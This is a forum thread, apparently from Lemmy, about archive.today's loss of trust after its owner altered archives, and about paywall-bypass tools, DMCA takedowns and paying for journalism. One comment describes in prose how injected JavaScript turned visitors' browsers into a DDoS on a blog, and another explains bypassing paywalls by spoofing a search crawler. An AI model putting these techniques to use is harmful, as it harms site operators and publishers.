That’s very 1984 of them
As someone who uses Bypass Paywalls Clean, this is so frustrating.
Bypass Paywalls Clean was chased off of the Firefox Add-Ons site, chased off of Gitlab, and chased off of Github via DMCA takedown notices for copyright infringement. It is now hosted on the Russian Gitflic.ru.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).
We have spent the better part of two decades dealing with the DMCA being used as an outright weapon to silence information that corporations and government find inconvenient mostly because that information is wildly incriminating for them. It works especially strongly because a large amount of the world’s internet has been consolidated to the US and its vast hosting structures like AWS and Cloudflare, putting enormous amounts of the internet under the direct influence of US laws like the DMCA.
Websites like Anna’s Archive, Libgen, and Sci-Hub live because they use hosting in countries that allow them to bypass these kind of restrictions. Russia is one of the most common countries for them to host the data out of due to the lack of enforcement of copyright laws, although it is obviously not the only country that these sites use.
Until we are able to alter international copyright protections to be reasonable instead of their current over-zealously and aggressively abusive nature, we will all suffer having to risk hosting of such sites in countries that are otherwise very unsavory to be associating with.
We live in the kind of world early piracy pioneers such as the original creators of The Pirate Bay were trying to fight from becoming a reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretations of copyright law so they could send these men to prison.
hey thanks, i had never heard of that bypass paywalls firefox addon
There’s also a version for Chrome if you swing that way.
I do not because I don’t like ads on Youtube, but thx.
Ironically, when Russia was joining the World Trade Organization in early 2010s, one requirement was for them to do something about pirate sites, namely torrent-sharing ones. So iirc the domain torrents.ru was taken away from what is now called RuTracker, and they blocked many other sites, which stay blocked to this day.
And now Firefox completely bans it from even being sideloaded.
I don’t think the issue is paywalls. I think the issue is the personal actions of the owner. I also really don’t think Russia plays into this. Again, the personal actions of the owner of achive[.]today were the reason it was removed. The site was used by the owner to personally attack someone.
Good reminder to donate to web.archive.org
I do hope this move results in more support for the IA/Wayback Machine and helps them to update some of their crawler tech — thanks to the rise of AI, some sites are effectively (thru captchas etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.
For anyone curious, I looked into the DDOSing, and what was done is a simple string of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone looked at an archive, they unknowingly sent a request to the blog under attack.
Good reminder to pay for journalism.
The Guardian, Le Monde, El País, Tageszeitung and many others need subscribers to stay independent of the oligarchs.
Also remember the journalists that need support the most are local papers and news stations. The big ones have plenty of donors, and while it’s worth the support, they are less likely to completely collapse than the news that is run in your city.
Go look for that independent source. They will report more news that actually affects you as well.
guardian is surviving by slowly becoming a tabloid. not sure if i would have paid for it anyway, and im not sure if this was preventable by paying for it in the first place.
yeah and they’re also transphobic af as a policy. don’t give them a damn cent
https://www.buzzfeed.com/patrickstrudwick/guardian-staff-trans-rights-letter
can also find more stuff by just looking up “the guardian transphobia”
Paying for journalism is ideal, but unfortunately makes it difficult to cite/link to a source the way Wikipedia needs as a way to ensure the information remains open and accessible.
Admittedly, I’m not familiar with these outlets enough to know if those paywalls are significant, but the problem with direct article links is that those links can change. Archival services (I suppose not archive[.]is) are important for ensuring those articles remain accessible in the format they were presented in.
I’ve come across a number of older Wikipedia articles about more minor or obscure events where links lead to local new outlet websites that no longer exist or were consumed by larger media outlets and as a result no longer provide an appropriate citation.
Paying for journalism simply promotes that those who don’t pay it don’t get it ie.: more paywalls, not less.
Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.
He only modified archived pages in response to a dox attempt?
And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.
Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
Actually a pretty good idea.
Only works for archived pages though, because for any regular page, a large portion of the page will be dynamically generated; hashing the HTML will only say the framework hasn’t changed.
As they should since it doesn’t matter.
Yeah, someone being shitty to you doesn’t mean go you full-fledged shitty in return, it kind of proves your lack of trustworthiness to begin with. It’s like Nazis being like “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.
Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.
Yeah, ESH. His response of editing an archive showed the site to be unreliable as an archive. DDOSing from the site as a counter to the dox attempt caused the site serious reputational harm as well.
It sucks because his site was actually more reliable than The Internet Archive.
https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI
Okay so, what is the currently going-for alternative that bypasses paywalls?
i’ve had consistently good luck with the archive.org wayback machine
copy the headline and find the same thing free somewhere else. usually it’s a news site full of unreadable slop. pay walls used to be almost worth bypassing. no more. just another money grab, pretending to protect valuable information. not
Fair point. Very few if any news sites provide unique articles.
The root of the problem is Wikipedia not having local snapshots leaves their articles vulnerable to eroding sources.
Is it reasonable for them to keep their own local snapshots?
That’s not a trivial amount of work and data, particularly it it’s multimedia.
I think it’s a concerning issue affecting long-term viability of the platform. It’ll only get worse as time goes on and sources go offline.
How does the paywall circumvention of archive.today works?
It identifies itself as a google (or other) crawler, which sites often allow and give the full content to, for better SEO.
I guess that they genuinely owned subscriptions for popular paywalled sites.








